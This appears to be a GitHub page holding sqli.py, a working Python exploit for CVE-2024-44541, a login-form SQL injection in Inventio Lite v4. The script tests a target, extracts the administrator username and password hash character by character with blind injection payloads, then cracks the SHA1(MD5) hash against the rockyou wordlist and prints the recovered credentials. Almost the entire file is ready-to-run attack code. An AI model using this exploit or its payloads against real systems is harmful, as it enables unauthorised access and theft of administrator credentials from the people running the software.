-
Notifications
You must be signed in to change notification settings - Fork 0
/
sqli.py
122 lines (102 loc) · 4.17 KB
/
sqli.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
#!/usr/bin/python3
#
# CVE-2024-44541
# Author: Andrés Del Cerro a.k.a pointedsec
# Error Based SQLi in Inventio Lite v4
# This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it.
# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
#
#
import requests
import signal
from pwn import *
BASE_URL = "http://192.168.1.51/inventio-lite/"
PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"
LOGIN_ACTION = BASE_URL + "?action=processlogin"
# Handling Ctrl + C
def def_handler(x,y):
log.failure("Quitting...")
exit(1)
signal.signal(signal.SIGINT, def_handler)
def is_vulnerable():
log.info("Checking if target is vulnerable")
payload = {
"username": "\") \"",
"password": "\") \""
}
r = requests.post(LOGIN_ACTION, data=payload)
if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text):
return True
else:
return False
def get_administrator_hash(username):
prog_hash = log.progress("Extracting Admin Password Hash")
replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
admin_hash = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", admin_hash + char),
"password": "blablablbalbablalba123@"
}
try:
r = requests.post(LOGIN_ACTION, data=payload)
r.raise_for_status()
except requests.RequestException as e:
log.error(f"Request failed: {e}")
continue
if "<script>window.location='index.php?view=home';</script>" in r.text:
admin_hash += char
prog_hash.status("-> %s" % admin_hash)
found_char = True
break
if not found_char:
break
prog_hash.status("Final Admin Hash: %s" % admin_hash)
return admin_hash
def get_administrator_username():
prog_username = log.progress("Extracting Username")
replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
username = ""
while True:
found_char = False
for char in characters:
payload = {
"username": replace_payload.replace("<STR>", username + char),
"password": "blablablablbalbla123@"
}
r = requests.post(LOGIN_ACTION, data=payload)
if "<script>window.location='index.php?view=home';</script>" in r.text:
username += char
prog_username.status("-> %s" % username)
found_char = True
break
if not found_char:
break
return username
def decrypt_password(admin_hash):
# Encryption is SHA1(MD5(PWD))
with open(PWD_DIC_PATH) as password_file:
for password in password_file:
password = password.strip()
md5_hash = hashlib.md5(password.encode()).hexdigest()
sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest()
if sha1_hash == admin_hash:
return password
log.error("Password not found in the dictionary.")
return None
if __name__ == "__main__":
# Check if target is vulnerable
if not is_vulnerable():
log.failure("Target not Vulnerable...")
exit(1)
log.success("Target Vulnerable!")
log.info("Dumping Administrator username...")
admin_username = get_administrator_username()
admin_hash = get_administrator_hash(admin_username)
pwd = decrypt_password(admin_hash)
log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")